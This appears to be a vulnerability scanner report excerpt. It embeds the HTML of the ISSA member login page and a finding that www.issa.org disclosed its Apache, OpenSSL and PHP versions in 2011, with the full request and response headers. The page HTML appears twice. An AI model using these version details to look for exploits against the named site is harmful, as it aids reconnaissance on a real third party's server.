<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "MemberNumber"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:block; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" checked onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> <h2 class="loginBlock">3. Password</h2> <h3>Password</h3> <input type="password" id="SubmittedPassword" name="SubmittedPassword" class="TextField" /> <p><input type="submit" id="Submit" value="Log In"></p> </td> </tr> </table> </form> </div> <div id="Footer"> <p><a href="..
Apache Module Version Disclosure
Apache Module Version Disclosure
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.
Impact
An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.
Configure your web server to prevent information leakage from the SERVER
header of its HTTP response.
mod_bwlimited/1.4 PHP/5.2.9
Request
GET /Members/Log-In.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.issa.org
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:32:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=d959e12eb1519d0294397b6c62589f93; path=/,cookiecheck=issa
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "MemberNumber"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:block; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" checked onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> <h2 class="loginBlock">3. Password</h2> <h3>Password</h3> <input type="password" id="SubmittedPassword" name="SubmittedPassword" class="TextField" /> <p><input type="submit" id="Submit" value="Log In"></p> </td> </tr> </table> </form> </div> <div id="Footer"> <p><a href="..